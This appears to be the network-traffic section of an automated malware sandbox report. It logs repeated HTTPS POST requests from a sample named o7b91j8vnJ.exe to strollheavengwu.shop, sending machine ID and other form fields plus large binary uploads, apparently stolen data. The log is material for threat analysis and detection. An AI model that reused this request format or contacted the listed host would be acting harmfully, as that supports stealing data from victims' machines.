                                                  2024-04-24 23:59:54 UTC1369INData Raw: 67 48 35 4a 52 76 64 73 69 4b 4e 67 7a 30 4f 49 65 4f 73 4f 50 65 51 4a 78 7a 53 6a 59 47 51 44 71 41 54 6b 33 56 64 63 36 4b 61 50 59 78 6b 56 75 55 4f 45 70 47 43 64 51 74 73 75 39 78 55 31 75 67 2f 52 64 72 34 32 4a 31 48 72 54 65 65 61 55 30 6a 69 75 6f 41 2f 53 31 36 67 58 73 53 6d 66 38 68 44 69 48 6a 6c 43 44 33 6b 43 63 63 30 6f 32 41 56 44 34 41 6a 69 35 5a 44 47 62 66 30 67 45 51 4b 45 4c 74 53 33 72 45 2f 2f 51 65 56 62 65 6f 66 50 65 68 50 76 6c 4c 45 59 43 77 42 73 41 71 7a 6d 44 4d 79 68 50 62 45 59 45 6c 47 39 77 57 61 2b 79 65 4f 57 38 6b 38 6a 6e 55 6c 35 6d 6d 39 49 4d 64 4c 51 51 48 2b 43 4c 69 55 43 52 65 48 33 61 73 78 47 31 37 74 46 34 6a 6e 63 63 38 65 6e 32 33 77 48 58 32 57 50 39 63 30 6f 47 77 6b 53 75 68 50 38 4d 42 41 46 65 65
                                                  Data Ascii: gH5JRvdsiKNgz0OIeOsOPeQJxzSjYGQDqATk3Vdc6KaPYxkVuUOEpGCdQtsu9xU1ug/Rdr42J1HrTeeaU0jiuoA/S16gXsSmf8hDiHjlCD3kCcc0o2AVD4Aji5ZDGbf0gEQKELtS3rE//QeVbeofPehPvlLEYCwBsAqzmDMyhPbEYElG9wWa+yeOW8k8jnUl5mm9IMdLQQH+CLiUCReH3asxG17tF4jncc8en23wHX2WP9c0oGwkSuhP8MBAFee


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449732172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:54 UTC286OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 18167
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:54 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:54 UTC2836OUTData Raw: b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8
                                                  Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
                                                  2024-04-24 23:59:55 UTC812INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=n9ap7k7k2v8io70199tj8276jf; expires=Sun, 18-Aug-2024 17:46:33 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5d2thvt8xlbZDRds0TopIwSttfTVqJFfnovUQCMc44bAVqqegdPrzpmoVSZ7R3%2BPS5iuz8wRWXmOqM9OK%2BfNr56vN8UDuEbjASJszS5%2FMb6yTYk7j%2BmznTTXvHUW0VF%2FFPm8jHohNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cbdfcfd44d0-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:55 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449733172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:55 UTC285OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8788
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:55 UTC8788OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:55 UTC808INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=1qga6rcbh092r8iaqr0ngkqoe0; expires=Sun, 18-Aug-2024 17:46:34 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HjYXiT%2FHtMKaRqHtzbgrqctbFw3KabuExoFsL40exxirhxsPo6bN0SCX%2F8MK32I9Sncs9pBOfqNo1shqxYU1yIMPqVxzimUGevCjCEPZB4J%2FyOUXqnvXhjKE2RUmkvM6SgCSTI6UfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cc358ccb045-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:55 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.449734172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:56 UTC286OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 20441
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:56 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:56 UTC5110OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61
                                                  Data Ascii: `M?lrQMn 64F6(X&7~`a
                                                  2024-04-24 23:59:56 UTC812INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=dm6uvc98pclpamri2lsq6egjnu; expires=Sun, 18-Aug-2024 17:46:35 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h40V8J7WVz6j9vZvD2nCFPTBtYlv3wY%2Fe9UxkNYo8vcXAKdzfFPh3pgp%2FeuuhAjDWE6tfwpRYogNOt9UJOL3tifTuFqaWlR1O6iyOxEEdoEYLZhT%2Bsk%2Ft%2BYKI0kr4JiJjr9AkkZuDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cc9ce75ade4-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:56 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.449735172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:57 UTC285OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 5438
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:57 UTC5438OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:57 UTC802INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=rd61md0b7e5l2d8v0cv19holqe; expires=Sun, 18-Aug-2024 17:46:36 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccPfu5D9XkLy4Aeg4KCEy9xMK4CMrDqlKEgNeJx5AUmqKHkQybwoFevVvXPSs0zF5oXFO1DRQ06YMfKoT6AMeI7eM0qcCOTKEnZg1PrzAHc9NuQ7oniRkuir9Rp8tvaGsumiOk89aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0ccfca5a53af-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:57 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449736172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:58 UTC285OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 1412
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:58 UTC1412OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:58 UTC806INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=vvn02g9rdfvan5qmpuf4coois9; expires=Sun, 18-Aug-2024 17:46:37 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WPY7iLCUHYqtvUrXRcHS5XFXp631Fcva20PQ1d4kNiwtHVBAT4Ad5kl9V2Pw7%2BzF%2FlAE1iwZSiMP2wZh7iTtIx8TeibfbRAHF6xXtAqxmnQ4NUrHkTLjibt61g0BSepwRDXLzLWHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cd66dc744f9-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:58 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449737172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:59 UTC287OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 574078
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 3d 4d aa 91 2a ee 8c 59 8e 30 6d 7a 5d 99 59 ef 46 0d bb 8d 0e c5 23 64 21 aa 09 bd c4 28 e5 72 91 67 ee e7 c7 9e 84 1f 13 aa ec 36 d5 9c 60 55 56 dc e7 d0 c3 e5 5f 7d 99 fa 2d 8a c5 67 1c 74 c1 a2 74 4f 56 46 dc e5 7f bc 3e 55 10 92 85 d4 13 6f 1a a0 7d b4 bb 53 d4 1d 61 b6 be 6f a1 dd b5 1c 2f 4c 32 d7 a2 ef d1 ff ea 3f 5c ed 4f ba 6b 65 01 65 ea 22 54 e5 46 f5 6b 60 a9 16 1d e3 33 b9 08 e3 b3 3c e8 d7 85 ec e7 26 ff e8 70 3c ee cb 4b 04 7c 24 67 38 41 77 54 67 c9 6d 91 87 14 72 89 49 c1 5e 79 67 1c f9 f1 be 12 e4 b5 eb c3 b1 49 f8 ed 76 ae e2 58 5c 60 d8 c5 f5 70 df 63 a1 bb 59 ce ff 48 15 d4 d5 19 a3 02 26 88 05 98 22 a1 6a 8f 81 14 88 51 0d 95 89 e3 8e 34 33 f2 dd 81 19 7b a8 7c ba 68 f9 e3 fc 2a 48 3e c0 24 b0 10 0f b4 58 16 44 64 18 5e 83 75 3f 54
                                                  Data Ascii: =M*Y0mz]YF#d!(rg6`UV_}-gttOVF>Uo}Sao/L2?\Okee"TFk`3<&p<K|$g8AwTgmrI^ygIvX\`pcYH&"jQ43{|h*H>$XDd^u?T
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: ad d5 33 b8 a6 52 66 eb 58 45 a5 53 b4 1c 76 c1 6d 67 a2 70 57 ac c6 e7 f1 92 63 51 6d 44 9a 7a ef 4d 13 17 d6 4e cf a3 a7 24 d5 13 96 d7 03 4e db 34 1d ce 13 fd 72 81 da 54 55 99 cd 4c 6a 9d d4 61 5b e2 05 16 15 72 87 63 7d 8f 45 f2 41 93 3b 46 f5 02 be b1 45 30 3f 06 b2 67 6b 2a c7 54 28 be 5b c3 66 ce 19 fe 1b b3 13 bc dc dd 15 f3 ee cf 2e d8 23 fb be 2d 76 13 5b b0 1f fd e9 e6 7a cd ec 1f a1 dc be 96 35 f6 42 88 ef f4 13 47 4a 8b 17 a1 4e 26 31 e4 76 eb a2 a6 e7 a8 1b b5 4e af 31 58 9a 73 ee 63 26 e2 18 69 48 3c 45 d2 95 bf f4 74 5d 2a fa 8b ff c6 b8 37 c0 aa c7 fc 10 8c 66 78 62 0f be 3e 79 24 a3 05 8a ff 7c 5b 5c e2 46 a4 ba a2 63 b3 8e 94 37 4f 78 c7 14 67 d5 a0 2c 29 e3 f1 55 92 ca 9a 65 5b 8c 77 02 ef 07 1f ee 23 59 3e 32 45 f5 8b 8b c6 e7 1f c2
                                                  Data Ascii: 3RfXESvmgpWcQmDzMN$N4rTULja[rc}EA;FE0?gk*T([f.#-v[z5BGJN&1vN1Xsc&iH<Et]*7fxb>y$|[\Fc7Oxg,)Ue[w#Y>2E
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: a8 70 bc 89 18 49 9a 29 ec 78 10 7b 87 fa e8 c9 4d 2d 33 55 97 60 67 bb c7 6a 99 aa 62 c6 60 6a 55 a2 ef 56 a8 eb a0 bb c3 8f e3 de 33 8c 34 69 fb 95 78 4c 12 02 7c fc 6d 57 e5 32 65 aa 0e 1b 22 33 ef 62 b6 ca 63 df 88 e3 f6 99 a1 e9 eb c1 6a 32 c7 be 11 97 9e 4a 0f 1e 00 71 d8 02 84 69 00 d2 dc 11 fb 4b 35 ec d7 c2 b9 4f 78 b3 0c 43 51 cc e2 f1 eb 12 2b 5d 5d e1 25 96 69 f4 5d 28 25 dc 4e 38 0e 3c 42 92 8e d8 6e 4c 55 78 bc f7 f4 76 ed 1f 74 0a af fc 57 81 46 4a 59 ac 7f 2f 55 3c 4a 75 63 3c f9 b7 de 6d 30 b5 67 a1 d3 51 54 84 32 e4 3e 93 8e bc fe f5 91 25 05 5c fb d6 f6 a4 60 a4 71 4f 51 ce 95 bb 2f 5a 2e 5a 7e 9a 99 e1 8d cd 7e b1 ba fc b6 9c 0a 5d f8 5e 5e 43 b4 70 af 34 9d 1d ca 35 58 ad 71 d5 10 7e fe 7e 19 ce aa 5e 03 dd 85 6b b3 9c 8e 5d b9 43 5c
                                                  Data Ascii: pI)x{M-3U`gjb`jUV34ixL|mW2e"3bcj2JqiK5OxCQ+]]%i](%N8<BnLUxvtWFJY/U<Juc<m0gQT2>%\`qOQ/Z.Z~~]^^Cp45Xq~~^k]C\
